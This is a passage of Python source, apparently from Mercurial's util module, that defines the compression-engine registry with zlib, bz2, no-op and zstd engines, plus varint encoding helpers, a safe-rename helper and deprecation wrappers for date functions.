            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

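    # For example, with the built-in engines the server-side order is zstd,
    # zlib, bzip2, none, while the client-side order is zstd, zlib, none,
    # bzip2 (assuming the optional zstd module is available).
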
    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
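
# A minimal sketch of a custom engine (hypothetical, for illustration only;
# Mercurial does not ship an 'identity' engine):
#
#   class _identityengine(compressionengine):
#       def name(self):
#           return 'identity'
#       def compressstream(self, it, opts=None):
#           return it
#       def decompressorreader(self, fh):
#           return fh
#
#   compengines.register(_identityengine())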

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between speed and compression
        ratio.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through the generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
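
# Illustrative roundtrip through the registry (a sketch; it assumes the
# stringio helper imported above and that chunkbuffer.read() with no
# argument drains the stream):
#
#   eng = compengines['zlib']
#   blob = ''.join(eng.compressstream([b'x' * 1000]))
#   assert eng.decompressorreader(stringio(blob)).read() == b'x' * 1000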

class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't, because
    # uncompressed payloads can easily saturate your network pipe unless
    # you are on a fast network.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
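
# Illustrative use of the revlog compressor API (a sketch; it requires the
# optional zstd module and example data that is large and redundant enough
# to shrink):
#
#   if compengines['zstd'].available():
#       c = compengines['zstd'].revlogcompressor()
#       c.compress(b'chunk' * 100)  # -> compressed bytes, or None if the
#                                   #    result would not be smaller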

def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn
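
# For example, safename('foo', 'resolve', ctx) returns 'foo~resolve' when
# that name is unused, and 'foo~resolve~1', 'foo~resolve~2', ... otherwise.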

def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the value in groups of 7 bits, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)
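
# Worked example: 1337 is 0b10100111001. The low 7 bits (0b0111001 = 0x39)
# go out first with the continuation bit set (0x80 | 0x39 = 0xb9), then the
# remaining bits (0b1010 = 0x0a) without it, giving '\xb9\n'.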

def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7

###
# Deprecation warnings for util.py splitting
###

defaultdateformats = dateutil.defaultdateformats

extendeddateformats = dateutil.extendeddateformats

def makedate(*args, **kwargs):
    msg = ("'util.makedate' is deprecated, "
           "use 'utils.dateutil.makedate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.makedate(*args, **kwargs)

def datestr(*args, **kwargs):
    msg = ("'util.datestr' is deprecated, "
           "use 'utils.dateutil.datestr'")
    nouideprecwarn(msg, "4.6")
    debugstacktrace()
    return dateutil.datestr(*args, **kwargs)

def shortdate(*args, **kwargs):
    msg = ("'util.shortdate' is deprecated, "
           "use 'utils.dateutil.shortdate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.shortdate(*args, **kwargs)

def parsetimezone(*args, **kwargs):
    msg = ("'util.parsetimezone' is deprecated, "
           "use 'utils.dateutil.parsetimezone'")
    nouideprecwarn(msg, "4.6")
    return dateutil.parsetimezone(*args, **kwargs)

def strdate(*args, **kwargs):
    msg = ("'util.strdate' is deprecated, "
           "use 'utils.dateutil.strdate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.strdate(*args, **kwargs)

def parsedate(*args, **kwargs):
    msg = ("'util.parsedate' is deprecated, "
           "use 'utils.dateutil.parsedate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.parsedate(*args, **kwargs)

def matchdate(*args, **kwargs):
    msg = ("'util.matchdate' is deprecated, "
           "use 'utils.dateutil.matchdate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.matchdate(*args, **kwargs)